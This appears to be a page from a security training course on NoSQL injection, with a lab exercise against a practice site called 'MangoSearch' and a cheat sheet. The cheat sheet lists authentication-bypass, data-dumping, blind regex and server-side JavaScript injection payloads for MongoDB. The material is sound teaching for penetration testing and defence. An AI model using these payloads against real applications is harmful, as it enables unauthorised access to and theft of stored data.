Introduction to NoSQL Injection

In-Band Data Extraction

Theory

In traditional SQL databases, in-band data extraction vulnerabilities can often lead to the entire database being exfiltrated. In MongoDB, however, since it is a non-relational database and queries are performed on specific collections, attacks are (usually) limited to the collection the injection applies to.

MangoSearch

In this section, we will take a look at MangoSearch. This application is vulnerable to in-band data extraction.

The website itself is very basic: A quote from Wikipedia. An image of a Mango. A search area where you can find facts about the various types of mangoes.

We can try searching one of the recommended types to see what request is sent and what sort of information is returned.

We can see that the search form sends a GET request where the search query is passed in the URL as ?q=<search term>. Similarly to the previous section, this is URL-encoded data, so keep in mind that any NoSQL queries we want to use will have to be formatted like param[$op]=val.

On the server side, the request being made will likely query the database to find documents that have a name matching $_GET['q'], like this:

db.types.find({
    name: $_GET['q']
});

We want to list out information for all types in the collection, and assuming our assumption of how the back-end handles our input is correct, we can use a RegEx query that will match everything like this:

db.types.find({
    name: {$regex: /.*/}
});

Upon sending the new request, we should see that all mango types and their corresponding facts are listed.

Alternative Queries

name: {$ne: 'doesntExist'}: Assuming doesntExist doesn't match any documents' names, this will match all documents.
name: {$gt: ''}: This matches all documents whose name is 'bigger' than an empty string.
name: {$gte: ''}: This matches all documents whose name is 'bigger or equal to' an empty string.
name: {$lt: '~'}: This compares the first character of name to a Tilda character and matches if it is 'less'. This will not always work, but it works in this case because Tilda is the largest printable ASCII value, and we know that all names in the collection are composed of ASCII characters.
name: {$lte: '~'}: Same logic as above, except it additionally matches documents whose names start with ~.

/ 1 spawns left

Waiting to start...

Questions

Answer the question(s) below to complete this Section and earn cubes!

Target: Click here to spawn the target system!

+ 10 Use any payload you like to dump all facts from MangoSearch and submit the flag.

+10 Streak pts

Previous Next

Go to Questions

Tools of the Trade

Defending against NoSQL Injection

Preventing NoSQL Injection Vulnerabilities

Skills Assessment

Skills Assessment I Skills Assessment II

My Workstation

OFFLINE

/ 1 spawns left

Cheat Sheet

The cheat sheet is a useful command reference for this module.

MongoDB Usage

Connect to MongoDB: mongosh mongodb://127.0.0.1:27017
List databases: show databases
List collections: show collections
Insert data: db.collection.insertOne({...})
Insert lots of data: db.apples.insertMany([{...},{...},...])
Selecting data: db.collection.find({...})
Selecting one piece of data: db.collection.findOne({...})
Update (one) document: db.collection.updateOne({...}, {...})
Update multiple documents: db.collection.updateMany({...}, {...})
Delete document(s): db.apples.remove({...})

Query Operators

Type	Operator	Description	Example
Comparison	`$eq`	Matches values which are `equal to` a specified value	`type: {$eq: "Pink Lady"}`
Comparison	`$gt`	Matches values which are `greater than` a specified value	`price: {$gt: 0.30}`
Comparison	`$gte`	Matches values which are `greater than or equal to` a specified value	`price: {$gte: 0.50}`
Comparison	`$in`	Matches values which exist `in the specified array`	`type: {$in: ["Granny Smith", "Pink Lady"]}`
Comparison	`$lt`	Matches values which are `less than` a specified value	`price: {$lt: 0.60}`
Comparison	`$lte`	Matches values which are `less than or equal to` a specified value	`price: {$lte: 0.75}`
Comparison	`$nin`	Matches values which are `not in the specified array`	`type: {$nin: ["Golden Delicious", "Granny Smith"]}`
Logical	`$and`	Matches documents which `meet the conditions of both` specified queries	`$and: [{type: 'Granny Smith'}, {price: 0.65}]`
Logical	`$not`	Matches documents which `do not meet the conditions` of a specified query	`type: {$not: {$eq: "Granny Smith"}}`
Logical	`$nor`	Matches documents which `do not meet the conditions` of any of the specified queries	`$nor: [{type: 'Granny Smith'}, {price: 0.79}]`
Logical	`$or`	Matches documents which `meet the conditions of one` of the specified queries	`$or: [{type: 'Granny Smith'}, {price: 0.79}]`
Evaluation	`$mod`	Matches values which divided by a `specific divisor` have the `specified remainder`	`price: {$mod: [4, 0]}`
Evaluation	`$regex`	Matches values which `match a specified RegEx`	`type: {$regex: /^G.*/}`
Evaluation	`$where`	Matches documents which `satisfy a JavaScript expression`	`$where: 'this.type.length === 9'`

Authentication Bypass / Data Exfiltration Payloads:

URL-Encoded

param[$ne]=x
param[$gt]=
param[$gte]=
param[$lt]=~
param[$lte]=~
param[$regex]=.*

JSON

{param: {$ne: 'x'}}
{param: {$gt: ''}}
{param: {$gte: ''}}
{param: {$lt: '~'}}
{param: {$lte: '~'}}
{param: {$regex: '.*'}}
{param: {$nin: []}}

Blind NoSQLi Payloads:

URL-Encoded

param[$regex]=^XYZ.*$

JSON

{param: {$regex: '^XYZ.*$}}

Server-Side JavaScript Injection Payloads:

' || true || ''=='
" || true || ""=="

This cheat sheet contains a (non-comprehensive) list of payloads you may use when testing an application for NoSQL injection vulnerabilities. The most important qualities for finding vulnerabilities are creativity and the ability to adapt, so it is possible that these payloads will not work in your specific scenario, but something else does.

Some other resources you may want to refer to may be: